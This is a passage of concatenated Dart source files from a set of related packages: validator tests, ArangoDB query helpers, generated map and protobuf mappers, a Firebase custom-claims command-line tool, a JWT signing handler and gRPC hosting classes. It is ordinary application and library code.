expect(recipeErrors.validationErrors.length, 1);
expect(recipeErrors.hasErrors, true);
});
test('missing title and description', () {
var recipe = Recipe(title: '', description: null);
var validator = $RecipeValidator();
var titleError = validator.validateTitle(recipe.title);
var descriptionError = validator.validateDescription(recipe.description);
var recipeErrors = validator.validate(recipe);
expect(titleError?.propertyName, 'title');
expect(descriptionError?.propertyName, 'description');
expect(recipeErrors.validationErrors.length, 2);
expect(recipeErrors.hasErrors, true);
});
test('No range error', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 15,
rInt: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.hasErrors, false);
});
test('Description too small', () {
final ingredient = Ingredient(
description: '',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 15,
rInt: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'description');
});
test('Notes is too big', () {
final ingredient = Ingredient(
description: 'this is big enough',
notes: 'this is just too big',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 15,
rInt: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'notes');
});
test('too small tag', () {
final ingredient = Ingredient(
description: 'this is big enough',
tag: '',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 15,
rInt: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'tag');
});
test('too small quantity', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 5,
intQuantity: 15,
rInt: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'quantity');
});
test('too big quantity', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 25,
intQuantity: 15,
rInt: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'quantity');
});
test('too small precision', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(5),
quantity: 15,
intQuantity: 15,
rInt: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'precision');
});
test('too small intQuantity', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 5,
rInt: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'intQuantity');
});
test('too big intQuantity', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 25,
rInt: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'intQuantity');
});
test('missing rInt', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 15,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'rInt');
});
test('too small rInt', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 15,
rInt: 5,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'rInt');
});
test('too big rInt', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 15,
rInt: 25,
);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'rInt');
});
test('too small nIntQuantity', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 15,
rInt: 15,
nintQuantity: 5);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'nintQuantity');
});
test('too big nIntQuantity', () {
final ingredient = Ingredient(
description: 'this is big enough',
precision: Decimal.fromInt(15),
quantity: 15,
intQuantity: 15,
rInt: 15,
nintQuantity: 25);
final validator = $IngredientValidator();
final errors = validator.validate(ingredient);
expect(errors.validationErrors.first.propertyName, 'nintQuantity');
});
test('too empty', () {
final empty = Empty();
final validator = $EmptyValidator();
final errors = validator.validate(empty);
expect(errors.validationErrors.isEmpty, true);
});
});
}
<|start_filename|>arango_driver/lib/src/query/line_if_then.dart<|end_filename|>
import 'query_text_fragment.dart';
/// Line of query text with condition.
/// If [bool] `cond` is true, then [String] `whenTrue` will be pasted into the query.
/// Sample:
/// ```
/// Query([
/// Line('FOR doc in documents'),
/// LineIfThen(tag != null, 'FILTER doc.tags && POSITION( doc.tags, tag )'),
/// ...
/// ])
/// ```
class LineIfThen extends QueryTextFragment {
LineIfThen(bool cond, String whenTrue) : super(cond ? whenTrue : '');
}
<|start_filename|>arango_driver/lib/src/query/line.dart<|end_filename|>
import 'query_text_fragment.dart';
/// A simple text line to be injected into a query constructed by [Query].
/// Sample:
/// ```
/// Query([ Line('FOR doc in documents'), ... ])
/// ```
class Line extends QueryTextFragment {
Line(String line) : super(line);
@override
String toString() => line;
}
<|start_filename|>map_mapper/test/lib/src/category.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'category.dart';
// **************************************************************************
// MapMapGenerator
// **************************************************************************
class $CategoryMapMapper extends MapMapper<Category> {
const $CategoryMapMapper();
@override
Category fromMap(Map<String, dynamic> map) {
final $kh = const DefaultKeyHandler();
return Category(
id: $kh.keyFromMap(map, 'id'),
title: map['title'] as String,
mainComponentId: $kh.keyFromMap(map, 'mainComponentId'),
mainComponent: const $ComponentMapMapper().fromMap(map['mainComponent']),
alternativeComponent: (map['alternativeComponent'] != null
? const $ComponentMapMapper().fromMap(map['alternativeComponent'])
: null),
otherComponents: List<Component>.unmodifiable(map['otherComponents']
.map((e) => const $ComponentMapMapper().fromMap(e))),
secondaryComponents: map['secondaryComponents'] == null
? null
: List<Component>.unmodifiable(map['secondaryComponents']
.map((e) => const $ComponentMapMapper().fromMap(e))),
);
}
@override
Map<String, dynamic> toMap(Category instance) {
final $kh = const DefaultKeyHandler();
final map = <String, dynamic>{};
$kh.keyToMap(map, instance.id, 'id');
map['title'] = instance.title;
$kh.keyToMap(map, instance.mainComponentId, 'mainComponentId');
map['mainComponent'] =
const $ComponentMapMapper().toMap(instance.mainComponent);
map['alternativeComponent'] = (instance.alternativeComponent == null
? null
: const $ComponentMapMapper().toMap(instance.alternativeComponent!));
map['otherComponents'] = instance.otherComponents
.map((e) => const $ComponentMapMapper().toMap(e))
.toList();
map['secondaryComponents'] = instance.secondaryComponents == null
? null
: instance.secondaryComponents!
.map((e) => const $ComponentMapMapper().toMap(e))
.toList();
return map;
}
}
extension $CategoryMapExtension on Category {
Map<String, dynamic> toMap() => const $CategoryMapMapper().toMap(this);
static Category fromMap(Map<String, dynamic> map) =>
const $CategoryMapMapper().fromMap(map);
}
extension $MapCategoryExtension on Map<String, dynamic> {
Category toCategory() => const $CategoryMapMapper().fromMap(this);
}
class $CategoryFieldNames {
final $kh = const DefaultKeyHandler();
final String fieldName;
final String prefix;
$CategoryFieldNames.sub(this.fieldName) : prefix = fieldName + '.';
const $CategoryFieldNames()
: fieldName = '',
prefix = '';
static const _id = 'id';
String get id => prefix + $kh.fieldNameToMapKey(_id);
static const _title = 'title';
String get title => prefix + _title;
static const _mainComponentId = 'mainComponentId';
String get mainComponentId =>
prefix + $kh.fieldNameToMapKey(_mainComponentId);
static const _mainComponent = 'mainComponent';
$ComponentFieldNames get mainComponent =>
$ComponentFieldNames.sub(prefix + _mainComponent);
static const _alternativeComponent = 'alternativeComponent';
$ComponentFieldNames get alternativeComponent =>
$ComponentFieldNames.sub(prefix + _alternativeComponent);
static const _otherComponents = 'otherComponents';
$ComponentFieldNames get otherComponents =>
$ComponentFieldNames.sub(prefix + _otherComponents);
static const _secondaryComponents = 'secondaryComponents';
$ComponentFieldNames get secondaryComponents =>
$ComponentFieldNames.sub(prefix + _secondaryComponents);
@override
String toString() => fieldName;
}
<|start_filename|>firebase-auth-admin/bin/set_custom_claims_command.dart<|end_filename|>
import 'dart:convert';
import 'package:args/args.dart';
import 'command.dart';
import 'common_options.dart';
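/// Command that sets custom claims on a Firebase user.
///
/// An illustrative invocation (the uid and claim values below are made up,
/// not taken from this repository):
///
///     firebase-auth -p service-account.json setCustomClaims -u some-uid -a adm:true -r stale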
class SetCustomClaimsCommand extends Command {
final String uid;
final bool clear;
final List<String> add;
final List<String> remove;
final Map<String, dynamic>? jsonMap;
SetCustomClaimsCommand(
CommonOptions commonOptions,
this.uid, {
required this.clear,
required this.add,
required this.remove,
this.jsonMap,
}) : super(commonOptions);
factory SetCustomClaimsCommand.fromResults(
CommonOptions commonOptions,
ArgResults results,
) {
final uid = results['uid'];
final clear = results['clear'] ?? false;
final add = results['add'] as List<String>;
final remove = results['remove'] as List<String>;
final jsonText = results['json'] as String? ?? '';
final Map<String, dynamic>? jsonMap =
jsonText.isEmpty ? null : jsonDecode(jsonText);
return SetCustomClaimsCommand(
commonOptions,
uid,
clear: clear,
add: add,
remove: remove,
jsonMap: jsonMap,
);
}
static void addCommand(ArgParser parser) {
var cc = parser.addCommand('setCustomClaims');
cc.addOption(
'uid',
abbr: 'u',
help: 'UID of the user',
mandatory: true,
);
cc.addOption(
'json',
abbr: 'j',
help: 'Parse the base claims from the given JSON structure.',
);
cc.addFlag(
'clear',
abbr: 'c',
help: 'Remove all previously existing claims',
defaultsTo: false,
);
cc.addMultiOption(
'add',
abbr: 'a',
help:
'''Add claim with its name and value separated by a colon (ex: adm:true).''',
);
cc.addMultiOption(
'remove',
abbr: 'r',
help: '''Remove the claim with the name.''',
);
}
}
<|start_filename|>proto_mapper/test/lib/grpc/key.pb.dart<|end_filename|>
///
// Generated code. Do not modify.
// source: key.proto
//
// @dart = 2.12
// ignore_for_file: annotate_overrides,camel_case_types,unnecessary_const,non_constant_identifier_names,library_prefixes,unused_import,unused_shown_name,return_of_invalid_type,unnecessary_this,prefer_final_fields
import 'dart:core' as $core;
import 'package:protobuf/protobuf.dart' as $pb;
class GKey extends $pb.GeneratedMessage {
static final $pb.BuilderInfo _i = $pb.BuilderInfo(
const $core.bool.fromEnvironment('protobuf.omit_message_names')
? ''
: 'GKey',
createEmptyInstance: create)
..aOS(
1,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'key')
..hasRequiredFields = false;
GKey._() : super();
factory GKey({
$core.String? key,
}) {
final _result = create();
if (key != null) {
_result.key = key;
}
return _result;
}
factory GKey.fromBuffer($core.List<$core.int> i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromBuffer(i, r);
factory GKey.fromJson($core.String i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromJson(i, r);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.deepCopy] instead. '
'Will be removed in next major version')
GKey clone() => GKey()..mergeFromMessage(this);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.rebuild] instead. '
'Will be removed in next major version')
GKey copyWith(void Function(GKey) updates) =>
super.copyWith((message) => updates(message as GKey))
as GKey; // ignore: deprecated_member_use
$pb.BuilderInfo get info_ => _i;
@$core.pragma('dart2js:noInline')
static GKey create() => GKey._();
GKey createEmptyInstance() => create();
static $pb.PbList<GKey> createRepeated() => $pb.PbList<GKey>();
@$core.pragma('dart2js:noInline')
static GKey getDefault() =>
_defaultInstance ??= $pb.GeneratedMessage.$_defaultFor<GKey>(create);
static GKey? _defaultInstance;
@$pb.TagNumber(1)
$core.String get key => $_getSZ(0);
@$pb.TagNumber(1)
set key($core.String v) {
$_setString(0, v);
}
@$pb.TagNumber(1)
$core.bool hasKey() => $_has(0);
@$pb.TagNumber(1)
void clearKey() => clearField(1);
}
class GListOfKey extends $pb.GeneratedMessage {
static final $pb.BuilderInfo _i = $pb.BuilderInfo(
const $core.bool.fromEnvironment('protobuf.omit_message_names')
? ''
: 'GListOfKey',
createEmptyInstance: create)
..pc<GKey>(
1,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'items',
$pb.PbFieldType.PM,
subBuilder: GKey.create)
..hasRequiredFields = false;
GListOfKey._() : super();
factory GListOfKey({
$core.Iterable<GKey>? items,
}) {
final _result = create();
if (items != null) {
_result.items.addAll(items);
}
return _result;
}
factory GListOfKey.fromBuffer($core.List<$core.int> i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromBuffer(i, r);
factory GListOfKey.fromJson($core.String i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromJson(i, r);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.deepCopy] instead. '
'Will be removed in next major version')
GListOfKey clone() => GListOfKey()..mergeFromMessage(this);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.rebuild] instead. '
'Will be removed in next major version')
GListOfKey copyWith(void Function(GListOfKey) updates) =>
super.copyWith((message) => updates(message as GListOfKey))
as GListOfKey; // ignore: deprecated_member_use
$pb.BuilderInfo get info_ => _i;
@$core.pragma('dart2js:noInline')
static GListOfKey create() => GListOfKey._();
GListOfKey createEmptyInstance() => create();
static $pb.PbList<GListOfKey> createRepeated() => $pb.PbList<GListOfKey>();
@$core.pragma('dart2js:noInline')
static GListOfKey getDefault() => _defaultInstance ??=
$pb.GeneratedMessage.$_defaultFor<GListOfKey>(create);
static GListOfKey? _defaultInstance;
@$pb.TagNumber(1)
$core.List<GKey> get items => $_getList(0);
}
<|start_filename|>squarealfa_security/lib/src/json_web_token_handler.dart<|end_filename|>
import 'dart:convert';
import 'package:crypto/crypto.dart';
import 'invalid_signature_exception.dart';
import 'invalid_token_exception.dart';
import 'jwt_payload.dart';
/// Generates and parses JWT tokens
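///
/// A minimal usage sketch (building the [JwtPayload] is omitted here,
/// since its claims depend on the application):
///
/// ```dart
/// final handler = JsonWebTokenHandler('my-signing-key');
/// final token = handler.generate(payload); // payload: a JwtPayload built elsewhere
/// final parsed = handler.load(token); // throws if the signature is invalid
/// ```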
class JsonWebTokenHandler {
final Hmac _hmac;
/// Constructs a [JsonWebTokenHandler] with the specified [key] for
/// signing the generated tokens and validating the tokens to be parsed.
JsonWebTokenHandler(String key) : _hmac = Hmac(sha256, utf8.encode(key));
/// Creates a new JWT token with a payload represented by [payload].
String generate(JwtPayload payload) {
var headerBase64 = _serializeHeader();
var payloadBase64 = _serializePayload(payload);
var signature = _sign(headerBase64, payloadBase64);
var ret = '$headerBase64.$payloadBase64.$signature';
return ret;
}
/// Parses a JWT token, validating it, and returns a [JwtPayload] representing
/// its contents.
JwtPayload load(String token) {
if (token.startsWith('Bearer ')) {
token = token.substring('Bearer '.length);
}
var parts = token.split('.');
if (parts.length != 3) {
throw InvalidTokenException(reason: 'Token should have 3 sections.');
}
var headerBase64 = parts[0];
var payloadBase64 = parts[1];
var checkSignature = _sign(headerBase64, payloadBase64);
var signature = parts[2];
if (checkSignature != signature) {
throw InvalidSignatureException();
}
var payload = deserializeJwtPayload(payloadBase64, true);
return payload;
}
String _sign(String headerBase64, String payloadBase64) {
var content = '$headerBase64.$payloadBase64';
var digest = _hmac.convert(utf8.encode(content));
var signature = base64Encode(digest.bytes);
signature = _adjustBase64(signature);
return signature;
}
static JwtPayload deserializeJwtPayload(
String payloadBase64, bool isVerified) {
final json = decodeB64Json(payloadBase64);
final map = jsonDecode(json);
final ret = JwtPayload.fromMap(map).copyWith(
isVerified: isVerified,
);
return ret;
}
String _serializePayload(JwtPayload payload) {
final map = payload.claimsMap;
final json = jsonEncode(map);
final base64 = base64Encode(utf8.encode(json));
final adjustedBase64 = _adjustBase64(base64);
return adjustedBase64;
}
String _serializeHeader() {
var headerMap = <String, dynamic>{'alg': 'HS256', 'typ': 'JWT'};
var headerJson = jsonEncode(headerMap);
var headerBase64 = base64Encode(utf8.encode(headerJson));
headerBase64 = _adjustBase64(headerBase64);
return headerBase64;
}
String _adjustBase64(String base64Content) {
base64Content = Uri.encodeFull(base64Content);
while (base64Content.endsWith('=')) {
base64Content = base64Content.substring(0, base64Content.length - 1);
}
return base64Content;
}
}
String decodeB64Json(String payloadBase64) {
var delta4 = payloadBase64.length % 4;
if (delta4 > 0 && delta4 < 4) {
payloadBase64 =
payloadBase64.padRight(payloadBase64.length + (4 - delta4), '=');
}
var json = utf8.decode(base64Decode(payloadBase64));
return json;
}
<|start_filename|>firebase-auth-admin/lib/src/firebase_update_user.dart<|end_filename|>
import 'firebase_user_info.dart';
class FirebaseUpdateUser {
final FirebaseUserInfo info;
final String uid;
FirebaseUpdateUser({
required this.uid,
required this.info,
});
}
<|start_filename|>firebase-auth-admin/bin/firebase_auth_admin.dart<|end_filename|>
import 'package:firebase_auth_admin/firebase_auth_admin.dart' as firebase;
import 'command.dart';
void main(List<String> args) async {
try {
final command = Command.getCommand(args);
if (command == null) return;
firebase.initialize(command.commonOptions.privateKey);
switch (command.runtimeType) {
case SetCustomClaimsCommand:
await _setCustomClaims(command as SetCustomClaimsCommand);
break;
case GetCustomClaimsCommand:
await _getCustomClaims(command as GetCustomClaimsCommand);
}
} catch (ex) {
print('Error executing command.\n\nDetails:\n$ex');
}
}
Future<void> _setCustomClaims(SetCustomClaimsCommand command) async {
final uid = command.uid;
var claims = command.jsonMap != null
? command.jsonMap!
: (command.clear
? <String, dynamic>{}
: await firebase.getCustomClaims(uid));
if (!command.clear) {
for (final r in command.remove) {
claims.remove(r);
}
}
for (final a in command.add) {
final colonIx = a.indexOf(':');
final name = colonIx == -1 ? a : a.substring(0, colonIx);
final value = colonIx == -1 ? '' : a.substring(colonIx + 1);
claims[name] = value;
}
await firebase.setCustomClaims(uid, claims);
await _outputCustomClaims(uid, verb: 'Updated');
}
Future<void> _getCustomClaims(GetCustomClaimsCommand command) async {
final uid = command.uid;
await _outputCustomClaims(uid);
}
Future<void> _outputCustomClaims(String uid, {String verb = 'Current'}) async {
final claims = await firebase.getCustomClaims(uid);
print('$verb custom claims are:\n$claims');
}
<|start_filename|>proto_mapper/example/lib/src/ingredient.dart<|end_filename|>
import 'package:proto_annotations/proto_annotations.dart';
import 'grpc/ingredient.pb.dart';
part 'ingredient.g.dart';
@Proto()
@MapProto()
class Ingredient {
final String description;
final double quantity;
const Ingredient({
required this.description,
required this.quantity,
});
}
<|start_filename|>proto_mapper/proto_generator/lib/src/proto_mapper/field_code_generators/enum_field_code_generator.dart<|end_filename|>
import '../field_code_generator.dart';
import '../field_descriptor.dart';
class EnumFieldCodeGenerator extends FieldCodeGenerator {
EnumFieldCodeGenerator(
FieldDescriptor fieldDescriptor, {
String refName = FieldCodeGenerator.defaultRefName,
String protoRefName = FieldCodeGenerator.defaultProtoRefName,
}) : super(
fieldDescriptor,
refName: refName,
protoRefName: protoRefName,
) {
_prefix = fieldDescriptor.prefix;
}
String? _prefix;
@override
String get fromProtoNonNullableExpression =>
'''${fieldDescriptor.fieldElementTypeName}.values[$ref$fieldName.value]''';
@override
String get toProtoExpression =>
'''$_prefix${fieldDescriptor.fieldElementTypeName}
.valueOf($instanceReference.index)!''';
}
<|start_filename|>grpc_host/lib/src/services/authenticated_services.dart<|end_filename|>
import 'package:grpc/grpc.dart';
import 'package:grpc_host/grpc_host.dart';
import 'package:squarealfa_entity_adapter/squarealfa_entity_adapter.dart';
class AuthenticatedServices {
final ServiceCall call;
final Principal principal;
AuthenticatedServices(this.call) : principal = call.principal {
principal.throwIfUnauthenticated();
}
void throwOnError(ErrorList errors) {
if (errors.hasErrors) throw errors;
}
void throwUnauthorized() {
throw GrpcError.unauthenticated('Unauthorized');
}
void throwNotFound() {
throw GrpcError.notFound();
}
}
<|start_filename|>firebase-auth-admin/lib/src/firebase_create_user.dart<|end_filename|>
import 'firebase_user_info.dart';
class FirebaseCreateUser {
final FirebaseUserInfo info;
final String? uid;
const FirebaseCreateUser({
required this.info,
this.uid,
});
}
<|start_filename|>entity/entity_generator/lib/src/validation/field_descriptor.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
import 'package:source_gen/source_gen.dart';
import 'package:squarealfa_entity_annotations/squarealfa_entity_annotations.dart';
import 'package:squarealfa_generators_common/squarealfa_generators_common.dart';
class FieldDescriptor extends FieldElementDescriptorBase {
FieldDescriptor._(FieldElement fieldElement) : super(fieldElement);
factory FieldDescriptor.fromFieldElement(
ClassElement classElement,
FieldElement fieldElement,
) {
return FieldDescriptor._(
fieldElement,
);
}
bool get typeIsValidatable {
var annotation = TypeChecker.fromRuntime(Validatable)
.firstAnnotationOf(fieldElementType.element!);
return annotation != null;
}
bool get parameterTypeIsValidatable {
var annotation = TypeChecker.fromRuntime(Validatable)
.firstAnnotationOf(parameterType.element!);
return annotation != null;
}
}
<|start_filename|>map_mapper/map_mapper_annotations/lib/src/key_handler.dart<|end_filename|>
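/// Strategy used by generated mappers to translate entity key fields to
/// and from a map representation: [keyToMap] writes a key value into a
/// map, [keyFromMap] reads it back, and [fieldNameToMapKey] converts a
/// Dart field name into the map key used by the underlying store.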
abstract class KeyHandler {
const KeyHandler();
void keyToMap(
Map<String, dynamic> map,
String value, [
String fieldName = '',
]);
String keyFromMap(
Map<String, dynamic> map, [
String fieldName = '',
]);
String fieldNameToMapKey(String fieldName);
}
<|start_filename|>grpc_host/example/grpc_host_example.dart<|end_filename|>
import 'package:grpc/grpc.dart';
import 'package:grpc_host/grpc_host.dart';
import 'demo_service.pbgrpc.dart';
void main() async {
final host = ExampleHost();
host.serve();
}
/// This class hosts the server, which will
/// run several isolates, each waiting for
/// a gRPC connection to be established.
///
/// The number of isolates is a function of
/// the parameters defined by HostSettings:
/// isolatesMultiplier * the number of CPU
/// cores, plus the extraIsolates parameter.
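///
/// For example, with isolatesMultiplier: 2 on a 4-core machine and no
/// extra isolates configured, the host spawns 2 * 4 = 8 isolates (the
/// core count here is illustrative).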
class ExampleHost extends Host<String> {
ExampleHost() : super(ExampleHost.run);
@override
Settings<String> get settings {
final hostSettings = HostSettings(port: 9000, isolatesMultiplier: 2);
final settings = Settings<String>(hostSettings, appSettings: '');
return settings;
}
/// This method will be run for each of the spawned isolates
static void run(HostParameters<String> parms) async {
// It will launch the ExampleServicesHost instance
// that itself will finally host a set of
// services run by the isolate.
final host = ExampleServicesHost(parms);
await host.run();
}
}
class ExampleServicesHost extends ServicesHost {
ExampleServicesHost(HostParameters<String> parameters) : super(parameters);
@override
List<Service> get services => [GDemoService()];
}
class GDemoService extends GDemoServiceBase {
@override
Future<GPersonInsertResult> insertPerson(
ServiceCall call, GPerson request) async {
// insert the person in the database and return the result
// this is purely demonstrative.
final ret = GPersonInsertResult(key: request.key);
return ret;
}
}
<|start_filename|>nosql_repository/nosql_repository/lib/src/policy/create_policy.dart<|end_filename|>
import 'package:nosql_repository/nosql_repository.dart';
/// Defines the authorization policy for
/// create operations.
///
/// The [permission] property names the
/// permission a principal must hold for a
/// create operation to be authorized, as
/// checked by [isAuthorized]. An empty
/// [permission] means create operations are
/// not restricted by permission.
///
/// [filterByTenant] determines whether
/// created entities are bound to the same
/// tenant as the principal's. The
/// [CreatePolicy.root] constructor creates a
/// policy with no permission requirement and
/// no tenant filtering.
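///
/// A minimal usage sketch (the permission string below is hypothetical,
/// not part of this package):
///
/// ```dart
/// const policy = CreatePolicy(permission: 'recipes_create');
/// final allowed = policy.isAuthorized(principal); // principal: a DbPrincipal
/// ```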
class CreatePolicy extends PermissionPolicy {
const CreatePolicy({
String permission = '',
bool filterByTenant = true,
}) : super(
permission,
filterByTenant,
);
const CreatePolicy.root() : super('', false);
bool isAuthorized(DbPrincipal principal) =>
permission == '' || principal.hasPermission(permission);
}
<|start_filename|>defaults_provider/test/test/map_mapper_generator_test.dart<|end_filename|>
import 'package:decimal/decimal.dart';
import 'package:map_mapper_generator_test/defaults_provider_generator_test.dart';
import 'package:map_mapper_generator_test/src/all_nullable.dart';
import 'package:test/test.dart';
void main() {
group('basic test', () {
test('Test Strings', () {
var defaultsProvider = $RecipeDefaultsProvider();
final recipe = defaultsProvider.createWithDefaults();
expect(recipe.key, '');
expect(recipe.title, '');
});
test('Test List', () {
var defaultsProvider = $RecipeDefaultsProvider();
final recipe = defaultsProvider.createWithDefaults();
expect(recipe.ingredients, []);
});
test('Test int', () {
var defaultsProvider = $RecipeDefaultsProvider();
final recipe = defaultsProvider.createWithDefaults();
expect(recipe.numPosts, 0);
});
test('Test double', () {
var defaultsProvider = $RecipeDefaultsProvider();
final recipe = defaultsProvider.createWithDefaults();
expect(recipe.doubleNumPosts, 0.0);
});
test('Test decimal', () {
var defaultsProvider = $RecipeDefaultsProvider();
final recipe = defaultsProvider.createWithDefaults();
expect(recipe.decimalNumPosts, Decimal.zero);
});
test('Test recursion default', () {
var defaultsProvider = $RecipeDefaultsProvider();
var ingredientDefaultsProvider = $IngredientDefaultsProvider();
final recipe = defaultsProvider.createWithDefaults();
final defaultIngredient = ingredientDefaultsProvider.createWithDefaults();
expect(recipe.mainIngredient.description, defaultIngredient.description);
expect(recipe.mainIngredient.quantity, defaultIngredient.quantity);
});
test('Test override', () {
var defaultsProvider = $RecipeDefaultsProvider();
final recipe = defaultsProvider.createWithDefaults();
expect(recipe.category.title, 'my category');
});
test('Test all nullable', () {
var defaultsProvider = $AllNullableDefaultsProvider();
final an = defaultsProvider.createWithDefaults();
expect(an.prop1, isNull);
expect(an.prop2, isNull);
});
});
}
<|start_filename|>generators_common/lib/src/dart_type_extensions.dart<|end_filename|>
import 'package:analyzer/dart/element/type.dart';
extension TypeExtensions on DartType {
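/// Unwraps parameterized types such as List or Future and returns the
/// innermost type argument; when the type has no type arguments, the
/// type itself is returned.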
DartType get finalType {
var type = this;
while (type is ParameterizedType && type.typeArguments.isNotEmpty) {
type = type.typeArguments.first;
}
return type;
}
DartType get futureType {
var type = this;
if (type is ParameterizedType &&
type.typeArguments.isNotEmpty &&
type.isDartAsyncFuture) return type.typeArguments.first;
return type;
}
bool get isList {
var type = this;
while (type is ParameterizedType && type.typeArguments.isNotEmpty) {
if (type.isDartCoreList) {
return true;
}
type = type.typeArguments.first;
}
return false;
}
bool get isIterable {
var type = this;
while (type is ParameterizedType && type.typeArguments.isNotEmpty) {
if (type.isDartCoreIterable) {
return true;
}
type = type.typeArguments.first;
}
return false;
}
bool get isSet {
var type = this;
while (type is ParameterizedType && type.typeArguments.isNotEmpty) {
if (type.isDartCoreSet) {
return true;
}
type = type.typeArguments.first;
}
return false;
}
}
<|start_filename|>arango_driver/lib/src/query/query_text_fragment.dart<|end_filename|>
abstract class QueryTextFragment {
final String line;
QueryTextFragment(this.line);
@override
String toString() => line;
}
<|start_filename|>grpc_host/lib/src/hosting/principal_interceptor.dart<|end_filename|>
import 'dart:async';
import 'package:grpc/grpc.dart';
import 'package:grpc_host/grpc_host.dart';
import 'package:squarealfa_security/squarealfa_security.dart';
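/// Base gRPC interceptor that authenticates a call from its bearer
/// token and attaches a [Principal] to it.
///
/// A minimal subclass sketch (the signing key and the way claims map to
/// the principal's fields are assumptions of this sketch, not part of
/// this package):
///
/// ```dart
/// class MyInterceptor extends PrincipalInterceptor {
///   final _tokens = JsonWebTokenHandler('signing-key');
///
///   @override
///   Future<JwtPayload> getTokenPayload(String idToken) async =>
///       _tokens.load(idToken);
///
///   @override
///   Future<Principal> createPrincipal(JwtPayload payload) async {
///     // How claims translate to these fields is assumed here.
///     return Principal(
///       userKey: 'user-key-from-claims',
///       tenantKey: 'tenant-key-from-claims',
///       permissions: const {},
///       isAdministrator: false,
///       isAuthenticated: true,
///     );
///   }
/// }
/// ```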
abstract class PrincipalInterceptor {
/// Loads a JWT and validates it returning the payload.
Future<JwtPayload> getTokenPayload(String idToken);
/// Creates a principal that contains user identity and authorization
/// from a JWT payload.
Future<Principal> createPrincipal(JwtPayload payload);
FutureOr<GrpcError?> interceptor(
ServiceCall call,
ServiceMethod method,
) async {
await call.authenticate(
getTokenPayload: getTokenPayload,
createPrincipal: createPrincipal,
);
}
}
<|start_filename|>proto_mapper/test/lib/src/recipe_type.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'recipe_type.dart';
// **************************************************************************
// ProtoMapperGenerator
// **************************************************************************
class $RecipeTypesProtoMapper
implements ProtoMapper<RecipeTypes, GRecipeTypes> {
const $RecipeTypesProtoMapper();
@override
RecipeTypes fromProto(GRecipeTypes proto) => RecipeTypes.values[proto.value];
@override
GRecipeTypes toProto(RecipeTypes entity) =>
GRecipeTypes.valueOf(entity.index)!;
}
extension $GRecipeTypesProtoExtension on GRecipeTypes {
RecipeTypes toRecipeTypes() =>
const $RecipeTypesProtoMapper().fromProto(this);
}
<|start_filename|>generators_common/lib/src/field_element_descriptor_base.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
import 'package:squarealfa_generators_common/src/field_descriptor_base.dart';
/// Enhanced information over a [FieldElement]
class FieldElementDescriptorBase extends FieldDescriptorBase {
final FieldElement fieldElement;
FieldElementDescriptorBase(this.fieldElement)
: super.fromFieldElement(fieldElement);
}
<|start_filename|>map_mapper/test_mongo/lib/src/lists_host.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'lists_host.dart';
// **************************************************************************
// MapMapGenerator
// **************************************************************************
class $ListsHostMapMapper extends MapMapper<ListsHost> {
const $ListsHostMapMapper();
@override
ListsHost fromMap(Map<String, dynamic> map) {
